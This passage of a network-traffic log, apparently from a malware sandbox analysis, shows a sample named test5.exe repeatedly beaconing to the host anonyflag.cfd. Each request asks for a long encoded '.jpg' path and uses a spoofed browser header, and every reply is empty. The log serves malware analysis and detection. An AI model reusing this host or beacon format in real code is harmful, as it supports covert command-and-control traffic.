cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1718&rtt_var=649&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1679125&cwnd=237&unsent_bytes=0&cid=dde60ac98fd04611&ts=507&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:10 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:11 UTC	874	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:10 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:10 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rbJtuFvnJ4zXbhb2qSpjG6GLK%2Bfuge1qnLQcy6zB1Z%2FdV5rEpaBdklndaNZp6KKuc0eqmpDjBqIR6Fk1uNVANZv5iDgBlew1KMRahdGFiAL9sqx9gQzXIL5U5SUqr9c"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e867bf97c43b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1487&rtt_var=569&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1904761&cwnd=194&unsent_bytes=0&cid=8550d28f333e5012&ts=860&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49737	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:12 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:12 UTC	876	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:12 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Uygfk7HphXLGO8hYQSU3oVLB4a8tMtVrp9kepKDEZgQRZivHS3ueVtpugHz6qSVi6qxV%2BSN0JypQHysHDaibzNW3lomCNx0zWgcN58lOxWy0I4%2BeKc%2FRa4wO411TY1V"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e8737d510f55-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1660&rtt_var=649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1759036&cwnd=156&unsent_bytes=0&cid=16e6fb1c21f311c7&ts=500&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49738	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:14 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:14 UTC	874	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:14 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:14 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8rrlfCkSpuJZAc11R1cwA6s80awscaqYQZQ4ofOOmD3T7ezqxfqbAGiMW43%2BQlQSIDnMNlpt%2Bl3rM6eQ2RXo2qZFAuxzHPfvVQIYOIcrfqSZLU2JM561BnOb9XEKfiQU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e87edeeb4319-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1633&rtt_var=630&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1711606&cwnd=233&unsent_bytes=0&cid=f3cf749f82e0a395&ts=499&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49740	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:16 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:16 UTC	878	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:16 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:16 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWWLTSORNMmj%2BZr9Iy%2FuIX3QO9UdI%2BeIV0elnQMTuCck9DTsmMo4OYIiMJSyMoiTmxtZf3NcGYfbdG6KcW6irMTksxkqgStu7t1iBjBm0jLJV%2BobIL8swtF7hBJhZogm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e88b1f2d0f84-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1533&rtt_var=579&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1883870&cwnd=244&unsent_bytes=0&cid=2d44942b2a6ffd19&ts=515&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49742	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:18 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:18 UTC	882	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:18 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:18 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6GUX%2BBcYgusLmLyIEhMadeP3%2B0VbGkLqro%2FKlvSLTAlH96lElwfQuw7bLwIb4TZ6HUVOFpXhiv2SOWd%2FPg%2BO5xRRvosIm6ptmQr7NehiNwhTsNPXq%2FmI3mYDtoMAdrMB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e896ae2c8c36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1841&min_rtt=1822&rtt_var=697&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1602634&cwnd=165&unsent_bytes=0&cid=a994084e2b860896&ts=495&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49745	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:19 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:20 UTC	878	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:20 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:20 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lz6ayM1D6zcciM1FKaZVm9GjFJON9jIxu3E4jNnkD%2FzvHLBxjvC%2Btg%2BLDNR8vgLZc4tz0LAhEa2c6lypZti3sOlDK12zJonOtwNDSLK3Qpq%2BIc1tIIdFU40EGEozcV8J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e8a229574261-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1608&rtt_var=634&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1683967&cwnd=239&unsent_bytes=0&cid=36bc92e8288a044d&ts=492&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:21 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:22 UTC	878	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:22 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BgmMv8iN6xCLX9S4PsWxB%2FMOGd2ah8KjGHANvNwHIg%2BT0FbYMTTgm5EEe9lC7GE9HBCFv4Z5zlnjYkctOmKG8ZLTWFTFMuqW300P9MkPPT0Y8jrF1P1qI%2BWweCflOZpH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e8ad9a1a7cb4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1815&rtt_var=703&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1531200&cwnd=230&unsent_bytes=0&cid=5ab7be9ef77693b3&ts=508&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:23 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:24 UTC	880	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:23 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: HIT Age: 1 Last-Modified: Sat, 28 Dec 2024 10:36:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OchT4k1CBtTHuqo%2BHVo70ZmHXkC4nj7w9mQQVB%2Bj9fn8ytQCOmu1ajN5Fgy5DwnLRVqgIiggqMGYxR%2FsSrZDlll4j5eaSTXAzAQoLo36yp2qEvVtqOh8kSUJN5DMWtqC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e8b96a7f0f41-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1702&rtt_var=656&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1715628&cwnd=145&unsent_bytes=0&cid=be8cb6de3fdcbd3d&ts=458&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:25 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:25 UTC	878	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:25 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AVmsEMzXTpvIDQCc%2FgS6WxaHtnOVEdJxXekyCP6I0%2FzmBhPt7krhRo79Ji5OkLpIbt39TvtaCtXW8kL8fErm10F%2BqdXWo7heWdpVLOAiJ1D9AFYzKLUENsu%2FAbPX8UK9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e8c4ec768c1b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1885&min_rtt=1876&rtt_var=721&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1498204&cwnd=210&unsent_bytes=0&cid=318cf006e9e62feb&ts=506&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:27 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:27 UTC	874	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:27 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:27 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XC8qbS%2BTaeluUneFtJ08OKL0GKzdPXxzj5cU890PXFo3EmDfD9FX4GLGHmvcu7qhpynGEmM0BMXw7kjGbTFBtrOWMCG34A5EfJ0001QLA0XU%2FNHT2Qzsezoan26XsEma"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e8d0aae572bc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1844&min_rtt=1843&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1573275&cwnd=252&unsent_bytes=0&cid=745ab244ce55adf7&ts=512&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:29 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:29 UTC	884	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:29 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:29 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c3P%2FZ4nl%2B8KI1rsQm4K3sDCaFF4U6AgC%2B35HAZhRtGE2xEZPc%2FE%2Fd7DZMQXYGONyQpVCnIHECIlFJ7njg%2B7Qp6Cy0Q0w43ZE8THW8R2%2FHy6Q4W5Sspc3jBctAtRrZsFE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e8dc5c5032ca-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1988&rtt_var=772&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1392465&cwnd=221&unsent_bytes=0&cid=b982226034516624&ts=493&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:31 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:31 UTC	878	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:31 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:31 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N5H2sO4JSPsznDioSfpqXQSL5JV1RMlKnff3OoaRpDNYZ4ASXOuEcUzSnhjeC%2BKgH4FhVb7bE7MFiDx9rqXepSvxkv%2BbrIMpnJ%2Fyk42hA%2Fz5Nh1HnbCJsOSZH8ism0NW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e8e85a098ccd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1917&rtt_var=726&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1501285&cwnd=195&unsent_bytes=0&cid=603665d67b66eea1&ts=522&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:33 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:33 UTC	882	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:33 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:33 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2%2Bj1hd30F89VQ8U4QNI%2Bojn3ePu2Ip%2BmH227m4%2B2%2FPwBNEYd7jxPz5LV9dEew5P1EKvRYqdkIIL%2BFNC1wfiBdVvybFhCsvVYzRzLpDZhjuS1hAZmgXr3tm4H9jnwXg0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e8f44c2a191e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1500&rtt_var=564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1938911&cwnd=238&unsent_bytes=0&cid=214d61bde7bf21cd&ts=509&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:34 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:35 UTC	888	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:35 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:35 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bt1QfrDJUs5kydeGmYzuoT3Y5%2F4G87x4zSpeCNjOq6SYIRF8WTm6HX%2Fc8Mq50FVRFyWrNF0oT%2F%2FjHcWzhNONn0appXngnM%2F1FWv8Etq%2BfgtP5GTk%2Bu90k%2FHlvgBN0KC%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9002f8680d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: 